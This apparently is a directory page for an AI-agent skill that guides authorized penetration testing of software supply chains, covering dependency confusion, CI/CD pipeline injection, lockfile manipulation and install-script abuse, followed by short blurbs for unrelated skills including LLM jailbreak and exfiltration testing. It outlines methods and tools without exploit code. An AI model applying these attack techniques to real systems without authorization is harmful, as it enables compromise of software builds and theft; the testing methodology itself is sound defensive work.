pentest-supply-chain
This skill guides penetration testing of software supply chain vulnerabilities including dependency confusion attacks, CI/CD pipeline injection, lockfile manipulation, and build artifact verification. Use it when authorized to assess an organization's exposure to supply chain threats like those exploited in SolarWinds and Log4Shell incidents, particularly when evaluating dependency security, package registry risks, container integrity, and software bill of materials accuracy across development pipelines.
git clone --depth 1 https://github.com/jd-opensource/JoySafeter /tmp/pentest-supply-chain && cp -r /tmp/pentest-supply-chain/skills/pentest-supply-chain ~/.claude/skills/pentest-supply-chainSKILL.md
# Pentest Supply Chain ## Purpose Supply chain attacks (SolarWinds, Log4Shell, xz-utils) are the fastest-growing threat category. Shannon explicitly excludes "vulnerable third-party libraries." MITRE ATT&CK T1195 has zero coverage in any existing skill. ## Prerequisites ### Authorization Requirements - **Written authorization** with supply chain testing scope - **Repository access** for dependency and CI/CD analysis - **Registry awareness** — confirm which private registries are in use - **Build system access** for pipeline review (if white-box) ### Environment Setup - Snyk CLI for dependency vulnerability scanning - npm audit / pip-audit for ecosystem-specific checks - Trivy for container and filesystem scanning - socket.dev for dependency risk analysis ## Core Workflow 1. **Dependency Audit**: Analyze package.json/requirements.txt/go.mod for known vulnerable versions, unmaintained packages, suspicious dependencies. 2. **Dependency Confusion**: Check if internal package names can be claimed on public registries (npm, PyPI). Test namespace squatting. 3. **CI/CD Pipeline Security**: Review GitHub Actions/GitLab CI for injection via PR titles/branch names, secrets in logs, unpinned action versions, runner escape. 4. **Build Artifact Integrity**: Verify signatures on containers/packages, check for unsigned artifacts, test image tag mutability. 5. **Lockfile Integrity**: Detect lockfile injection (manipulated resolved URLs), verify lockfile-to-manifest consistency. 6. **Install Script Abuse**: Identify packages with install hooks executing arbitrary code, test typosquatting candidates. 7. **SBOM Generation**: Generate Software Bill of Materials and map transitive dependency risk with CVE correlation. ## Tool Categories | Category | Tools | Purpose | |----------|-------|---------| | Dependency Scanning | Snyk, npm audit, pip-audit | Known CVE detection | | Container Scanning | Trivy, Grype | Image vulnerability analysis | | Dependency Risk | socket.dev, Semgrep | Behavioral risk analysis | | CI/CD Review | custom scripts, actionlint | Pipeline security audit | | SBOM | syft, cyclonedx-cli | Bill of materials generation | ## References - `references/tools.md` - Tool function signatures and parameters - `references/workflows.md` - Attack pattern definitions and test vectors
You MUST use this before any creative work - creating features, building components, adding functionality, or modifying behavior. Explores user intent, requirements and design before implementation.
Use when you have a written implementation plan to execute in a separate session with review checkpoints
OpenClaw 安全检测工具,基于安全实践指南验证配置安全、权限隔离、网络策略、日志审计和运行时完整性
OpenClaw 攻击模式检测工具,识别数据外传、反弹Shell、文件泄露、Prompt注入、供应链投毒等高危行为,支持 MITRE ATT&CK 映射
Comprehensive PDF manipulation toolkit for extracting text and tables, creating new PDFs, merging/splitting documents, and handling forms. When Claude needs to fill in a PDF form or programmatically process, generate, or analyze PDF documents at scale.
AI/LLM application security testing — prompt injection, jailbreaking, data exfiltration, and insecure output handling per OWASP LLM Top 10.
Deep OWASP API Security Top 10 testing for REST, GraphQL, gRPC, and WebSocket APIs — BFLA, mass assignment, rate limiting, and unsafe consumption.